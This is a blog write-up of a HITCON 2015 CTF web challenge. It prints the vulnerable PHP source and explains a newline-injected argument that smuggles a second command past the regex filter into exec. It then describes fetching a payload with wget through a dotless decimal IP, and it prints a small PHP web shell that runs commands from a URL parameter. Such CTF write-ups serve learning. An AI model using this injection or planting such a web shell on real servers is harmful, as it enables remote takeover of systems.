Please enable JavaScript to view the comments powered by Disqus. Web 100 baby first - I4INFO

Web 100 baby first

Hitcon Ctf

Posted by Heeraj on October 19, 2015

If you like to read our old blogs you are welcome, I4INFO

This CTF challenges were very cool, I liked the challenges. I would like write today on web 100 , baby first challenge. I spend most of my time solving this challenge, but I didn't get it.

Source Code:
<?php
highlight_file(__FILE__);
$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
if ( !file_exists($dir) )
mkdir($dir);
chdir($dir);

$args = $_GET['args'];
for ( $i=0; $i<count($args); $i++ ){
if ( !preg_match('/^\w+$/', $args[$i]) )
exit();
}
exec("/bin/orange " . implode(" ", $args));
?>

During CTF, when I got the problem source code was visible due to the "highlight_file" function in php. After that it had function to make the directory. Butwhen I deployed the challenge, there was no directory created.

The argument were passed through the GET parameter, then there is for loop which loops till count of arguments. Everything was "0k" till now, exept the preg_match() which was filtering only the letters, characters and digits. This was a tension, I have to somehow bypass the preg_match() function.

Ya this was hard phase, because after this function you have exec() which executes the command. But in the case here, there is /bin/orange , I don't know what was orange anyway. I was think to use && or ; but that would not work.

For bypassing this function, we have to pass the argument as args[]=a%0A&args[]=touch&args[]=i4info. So now the problem was, what to do next? You can neither use dot or anyother command which would help us. But only thing we could do was , we have to use wget command but for that also, you would have give an IP addrss which don't contain dot. That's intresting an IP without dots.

This was totally new concept, we have to use something called resolving ip. Thus we can make the ip to long number format. Thus we can execute the wget command. You could do this all in folder such that you can make it a tar and execute php of the tar, anyway php will be executed. The exploit to be taken while wget is given below. Its really superb problem, the way of thinking that we take is very nice.

Exploit:
<?php
file_put_contents('shell.php', '
<?php
header("Content-Type: text/plain");
print shell_exec($_GET["cmd"]);
?>
');
?>

Thank you for reading the blog!